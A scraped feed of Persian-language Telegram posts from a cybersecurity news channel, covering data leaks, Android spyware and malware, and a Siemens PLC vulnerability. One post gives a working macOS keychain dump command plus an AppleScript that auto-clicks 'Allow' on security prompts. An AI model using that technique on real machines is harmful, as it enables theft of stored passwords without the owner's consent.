نزدیک به 10 میلیون رکورد محرمانه اطلاعاتی از بیمارستانهای مختلف در Dark Web Market به فروش گذاشته شده است!
حوزه بهداشت و درمان از مهمترین چالشها در حوزه امنیت اطلاعات به شمار می رود.
منبع:
http://searchsecurity.techtarget.com/news/450299408/10-million-hospital-patient-records-up-for-sell-on-dark-web-market
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
حوزه بهداشت و درمان از مهمترین چالشها در حوزه امنیت اطلاعات به شمار می رود.
منبع:
http://searchsecurity.techtarget.com/news/450299408/10-million-hospital-patient-records-up-for-sell-on-dark-web-market
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
SearchSecurity
10 million hospital patient records up for sale on dark web market
Hacker posts close to 10 million patient records stolen from various hospitals for sale on a dark net market.
🚨🚨پس از شایعاتی مبنی بر هک شدن دیتابیس ایرانسل متاسفانه هم اکنون دیتابیس شماره های ایرانسل در اینترنت برای دانلود پخش شده است
همچنین یک روبات تلگرام با نام @mtnprobot توسط هکر ها ساخته شده است که با دادن شماره ایرانسل تمامی مشخصات مشتری قابل رویت است. این اقدام حریم خصوصی کاربران ایرانسل را به شدت به خطر انداخته است.
💡خوشبختانه این ربات از دسترس خارج شده است.
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
همچنین یک روبات تلگرام با نام @mtnprobot توسط هکر ها ساخته شده است که با دادن شماره ایرانسل تمامی مشخصات مشتری قابل رویت است. این اقدام حریم خصوصی کاربران ایرانسل را به شدت به خطر انداخته است.
💡خوشبختانه این ربات از دسترس خارج شده است.
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
سخنگوی وزارت ارتباطات:
ربات فاش کننده اطلاعات کاربران اپراتور تلفن همراه ایرانسل مسدود شد
محمدرضا فرنقی راد:
🔹براساس دستور وزیر ارتباطات و فناوری اطلاعات و با هدف صیانت از اطلاعات کاربران، ربات فاش کننده اطلاعات کاربران اپراتور تلفن همراه ایرانسل با اقدامات انجام شده مسدود شد و کاربران نگران نباشند.
🔹همکاری با پلیس فتای کشور برای شناسایی فرد متخلف ادامه دارد و اطلاعات آن متعاقبا در دسترس مردم قرار خواهد گرفت. /ایرنا
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
ربات فاش کننده اطلاعات کاربران اپراتور تلفن همراه ایرانسل مسدود شد
محمدرضا فرنقی راد:
🔹براساس دستور وزیر ارتباطات و فناوری اطلاعات و با هدف صیانت از اطلاعات کاربران، ربات فاش کننده اطلاعات کاربران اپراتور تلفن همراه ایرانسل با اقدامات انجام شده مسدود شد و کاربران نگران نباشند.
🔹همکاری با پلیس فتای کشور برای شناسایی فرد متخلف ادامه دارد و اطلاعات آن متعاقبا در دسترس مردم قرار خواهد گرفت. /ایرنا
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
🚨نرم افزار رسمی برنامه یوفا 2016 اطلاعات خصوصی کاربران را از طریق فضای عمومی منتقل میکند:
این نرم افزار که بر روی سیستم عاملهای اندروید و ios در دسترس است باعث انتقال اطلاعات کاربران از طریق فضای غیر امن و رمز نگاری نشده می شود . این اطلاعات شامل : نام کاربری - کلمات عبور - ادرس و شماره تلفن فرد می باشد.
📚فایل تحلیل این نرم افزار را از آدرس زیر دریافت کنید:
http://wandera.com/downloads/Euro_Paper.pdf
منبع:
http://m.theregister.co.uk/2016/07/01/euro_2016_app_privacy_flap/
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
این نرم افزار که بر روی سیستم عاملهای اندروید و ios در دسترس است باعث انتقال اطلاعات کاربران از طریق فضای غیر امن و رمز نگاری نشده می شود . این اطلاعات شامل : نام کاربری - کلمات عبور - ادرس و شماره تلفن فرد می باشد.
📚فایل تحلیل این نرم افزار را از آدرس زیر دریافت کنید:
http://wandera.com/downloads/Euro_Paper.pdf
منبع:
http://m.theregister.co.uk/2016/07/01/euro_2016_app_privacy_flap/
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
سناریوی شماره 1: حمله به بخش تومورشناسی یک بیمارستان
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
سناریوی شماره 2: حمله به بخش آرشیو تصاویر و ارتباطات یک بیمارستان
📌کانال تخصصی امنیت سايبري
📢لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📌کانال تخصصی امنیت سايبري
📢لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
سناریوی شماره 3: حمله به بخش پرتونگاری یک بیمارستان
📌کانال تخصصی امنیت سايبري
📢لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📌کانال تخصصی امنیت سايبري
📢لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
🎥ویدئوی توضیحات ناسا برای علل ارائه طرح اینترنت در منظومه شمسی:
https://goo.gl/v4rU7z
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
https://goo.gl/v4rU7z
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
YouTube
Delay / Disruption Tolerant Networking
NASA’s Delay/Disruption Tolerant Network (DTN) is an important component of the evolving Solar System Internet that will improve communications between Earth...
🚨نرم افزار صفحه کلید اندروید با بیش از 50 میلیون بار نصب بر روی دستگاههای مختلف ، اطلاعات افراد را جمع اوری و مخفیانه ارسال میکند:
نرم افزار موسوم به Flash Keyboard که در رتبه 11 از 20 نرم افزار برتر در Google Play بود و بیش از 50 میلیون بار دانلود و نصب شده بود :
نیاز به دسترسی به بولوتوث، موقعیت جغرافیایی، مشخصات و تنظیمات WiFi، خواندن SMSها، حذف اعلان های دانلود، جمع آوری اطلاعات کاربر و ارسال آن به سرورهایی در US، هلند و چین جزئی از اقدامات این نرم افزار بوده است.
📚منبع:
http://goo.gl/mJfzEm
🔎گزارش تحلیلی از عملکرد نرم افزار:
https://goo.gl/5rxXR7
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
نرم افزار موسوم به Flash Keyboard که در رتبه 11 از 20 نرم افزار برتر در Google Play بود و بیش از 50 میلیون بار دانلود و نصب شده بود :
نیاز به دسترسی به بولوتوث، موقعیت جغرافیایی، مشخصات و تنظیمات WiFi، خواندن SMSها، حذف اعلان های دانلود، جمع آوری اطلاعات کاربر و ارسال آن به سرورهایی در US، هلند و چین جزئی از اقدامات این نرم افزار بوده است.
📚منبع:
http://goo.gl/mJfzEm
🔎گزارش تحلیلی از عملکرد نرم افزار:
https://goo.gl/5rxXR7
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
softpedia
Android Keyboard App with over 50 Million Installs Secretly Collects Your Data
Google removes, then re-admits app on the Play Store
🚨شناسایی آسیب پذیری رده High در تجهیزات زیمنس:
siemens — simatic_s7-300_with_profitnet_support_firmware
🔎شرح آسیب پذیری:
Siemens SIMATIC S7-300 Profinet-enabled CPU devices with firmware before 3.2.12 and SIMATIC S7-300 Profinet-disabled CPU devices with firmware before 3.3.12 allow remote attackers to cause a denial of service (defect-mode transition) via crafted (1) ISO-TSAP or (2) Profibus packets.
📚راه حل رفع آسیب پذیری:
http://goo.gl/JXQQ61
https://goo.gl/dPQgRi
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://goo.gl/qdeDTk
📧تماس با ادمين:
ict.sec@outlook.com
siemens — simatic_s7-300_with_profitnet_support_firmware
🔎شرح آسیب پذیری:
Siemens SIMATIC S7-300 Profinet-enabled CPU devices with firmware before 3.2.12 and SIMATIC S7-300 Profinet-disabled CPU devices with firmware before 3.3.12 allow remote attackers to cause a denial of service (defect-mode transition) via crafted (1) ISO-TSAP or (2) Profibus packets.
📚راه حل رفع آسیب پذیری:
http://goo.gl/JXQQ61
https://goo.gl/dPQgRi
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://goo.gl/qdeDTk
📧تماس با ادمين:
ict.sec@outlook.com
استشمام عطر خوش بوی
عیـــــد فطــر
از پنجره ملکوتی رمضان
گوارای وجود پاکتان
عیدتان مبـــــارک
https://goo.gl/qdeDTk
عیـــــد فطــر
از پنجره ملکوتی رمضان
گوارای وجود پاکتان
عیدتان مبـــــارک
https://goo.gl/qdeDTk
🚨🚨بد افزار موسوم به HummingBad تعداد 10ميليون دستگاه اندرويدي را آلوده ساخته و پیش بینی میشود میلیونها دستگاه دیگر را نیز در معرض خطر آلودگی قرار داده باشد.
http://goo.gl/DGWrzx
این بد افزار از نوع روت کیت بوده و توسط یک گروه تبهکار چینی به نام Yingmob تولید و منتشر شده است.
درصد آلودگی ورژن های مختلف سیستم عامل به شرح زیر است:
KitKat - 50%
Jelly Bean - 40%
Lollipop - 7%
Ice Cream Sandwich - 2%
Marshmallow - 1%
تبهکاران این دستگاههای آلوده را میتوانند بعنوان botnet بر علیه سازمانها و یا ارگانهای دولتی بکار گیرند یا کنترل دستگاه را به گروه تبهکار دیگری در وب تاریک بفروشند.
📚منبع:
http://goo.gl/UqZSRV
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
http://goo.gl/DGWrzx
این بد افزار از نوع روت کیت بوده و توسط یک گروه تبهکار چینی به نام Yingmob تولید و منتشر شده است.
درصد آلودگی ورژن های مختلف سیستم عامل به شرح زیر است:
KitKat - 50%
Jelly Bean - 40%
Lollipop - 7%
Ice Cream Sandwich - 2%
Marshmallow - 1%
تبهکاران این دستگاههای آلوده را میتوانند بعنوان botnet بر علیه سازمانها و یا ارگانهای دولتی بکار گیرند یا کنترل دستگاه را به گروه تبهکار دیگری در وب تاریک بفروشند.
📚منبع:
http://goo.gl/UqZSRV
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
🔎گوگل درحال آزمودن رمزنگاری Post-Quantum در Chrome است:
https://goo.gl/QtJj3N
براساس اظهارات اسنودن آژانس امنیت ملی آمریکا با استفاده از یک کامپیوتر کوانتمی فایلها را رمز گشایی می نمود.
محاسبات کوانتومی در مقیاس عمل یک هدف در دوردست است، اما برخی از اقدئامات وجود دارد که براساس برخی از جنبه های فیزیک کوانتوم و تعداد کمی از بیت های کوانتومی قابل پیاده سازی می باشند.
گوگل از این موضوع در رمزنگاری ارتباط بین مرورگر کروم و سرورهایش میخواهد استفاده نماید.
📚منبع برای مطالعه بیشتر :
https://goo.gl/MoglAO
https://goo.gl/W1Alde
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
https://goo.gl/QtJj3N
براساس اظهارات اسنودن آژانس امنیت ملی آمریکا با استفاده از یک کامپیوتر کوانتمی فایلها را رمز گشایی می نمود.
محاسبات کوانتومی در مقیاس عمل یک هدف در دوردست است، اما برخی از اقدئامات وجود دارد که براساس برخی از جنبه های فیزیک کوانتوم و تعداد کمی از بیت های کوانتومی قابل پیاده سازی می باشند.
گوگل از این موضوع در رمزنگاری ارتباط بین مرورگر کروم و سرورهایش میخواهد استفاده نماید.
📚منبع برای مطالعه بیشتر :
https://goo.gl/MoglAO
https://goo.gl/W1Alde
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
🚨نقص امنیت در OS X:
نمایش keychain password ها در یک فایل متنی ساده:
یک روش در OS X است که اجازه خواهد به داد هر کاربر به دسترسی یافتن به Keychain شما، بدون دسترسی sudo و یا هر پنجره از سیستم، در یک فایل متنی، نام کاربری و کلمه عبور نمایش داده شده در متن ساده وجود دارد. این روش در حداقل ورژن های 10.10 و 10.11.5، کار می کند.
روش متشکل از باز شدن ترمینال، و برش و چسباندن کد زیر:
security dump-keychain -d login.keychain > keychain.txt
شما می توانید گیر بیاندازید تمام پنجره های سیستم را با اجرای کد بالا و اضافه کردن اسکریپ زیر در ترمینال:
tell application "System Events"
repeat while exists (processes where name is "SecurityAgent")
tell process "SecurityAgent"
click button "Allow" of group 1 of window 1
end tell
delay 0.2
end repeat
end tell
📚منبع برای مطالعه بیشتر:
https://goo.gl/7LVX51
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
نمایش keychain password ها در یک فایل متنی ساده:
یک روش در OS X است که اجازه خواهد به داد هر کاربر به دسترسی یافتن به Keychain شما، بدون دسترسی sudo و یا هر پنجره از سیستم، در یک فایل متنی، نام کاربری و کلمه عبور نمایش داده شده در متن ساده وجود دارد. این روش در حداقل ورژن های 10.10 و 10.11.5، کار می کند.
روش متشکل از باز شدن ترمینال، و برش و چسباندن کد زیر:
security dump-keychain -d login.keychain > keychain.txt
شما می توانید گیر بیاندازید تمام پنجره های سیستم را با اجرای کد بالا و اضافه کردن اسکریپ زیر در ترمینال:
tell application "System Events"
repeat while exists (processes where name is "SecurityAgent")
tell process "SecurityAgent"
click button "Allow" of group 1 of window 1
end tell
delay 0.2
end repeat
end tell
📚منبع برای مطالعه بیشتر:
https://goo.gl/7LVX51
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📧تماس با ادمين:
ict.sec@outlook.com
Medium
Security Flaw in OS X displays all keychain passwords in plain text
This afternoon, a friend learned the hard way that you don’t let an unofficial company take control of your computer to provide “support”…
مدل امنیتی در اندروید:
📌کانال تخصصی امنیت سايبري
📢نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📌کانال تخصصی امنیت سايبري
📢نشر دهید.
@ict_security
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
الگوریتم هک PIN و پسورد کارتهای اعتباری با استفاده از ساعتهای هوشمند.
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯 عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯 عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
🚨هکر ها با استفاده از ساعتهای هوشمند یا ردیابهای بدنسازی می توانند پسورد کارتهای اعتباری را سرقت کنند.
محققین دانشگاه Binghamton و انستیتو تکنولوژی Stevens موفق شدند الگوریتمی را کشف کنند که PIN و پسورد کارت اعتباری با 80% موفقیت در اولین تلاش و با بیش از 90% موفقیت پس از تلاش سوم سرقت شود.
الگوریتم:
https://goo.gl/DUUQmS
📚منبع برای مطالعه بیشتر:
http://goo.gl/o7Gi9k
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯عضویت:
https://goo.gl/qdeDTk
📧تماس با ادمين:
ict.sec@outlook.com
محققین دانشگاه Binghamton و انستیتو تکنولوژی Stevens موفق شدند الگوریتمی را کشف کنند که PIN و پسورد کارت اعتباری با 80% موفقیت در اولین تلاش و با بیش از 90% موفقیت پس از تلاش سوم سرقت شود.
الگوریتم:
https://goo.gl/DUUQmS
📚منبع برای مطالعه بیشتر:
http://goo.gl/o7Gi9k
📌کانال تخصصی امنیت سايبري
📢 زکات علم نشر آن است. لطفا برای آگاهی دیگران نیز نشر دهید.
@ict_security
🛡🎯عضویت:
https://goo.gl/qdeDTk
📧تماس با ادمين:
ict.sec@outlook.com
Telegram
امنیت سایبری
الگوریتم هک PIN و پسورد کارتهای اعتباری با استفاده از ساعتهای هوشمند.
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯لینک عضویت:
https://telegram.me/joinchat/BaPoBjumXnAJvmKuYQQQbQ
🚨حساب توییتری جک دورسی - مدیرعامل توییتر- هک شد.
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯 عضویت:
https://goo.gl/qdeDTk
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯 عضویت:
https://goo.gl/qdeDTk
ترانه علیدوستی خطاب به هکر ها...
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯 عضویت:
https://goo.gl/qdeDTk
📌کانال تخصصی امنیت سايبري
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯 عضویت:
https://goo.gl/qdeDTk
الگوریتم استفاده از دستورات صوتی مخفیانه در فیلم های یوتیوب برای حمله به گوشی های اندروید یا iOS .
@ict_security
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯 عضویت:
https://goo.gl/qdeDTk
@ict_security
📢 لطفا برای آگاهی دیگران نیز نشر دهید.
🛡🎯 عضویت:
https://goo.gl/qdeDTk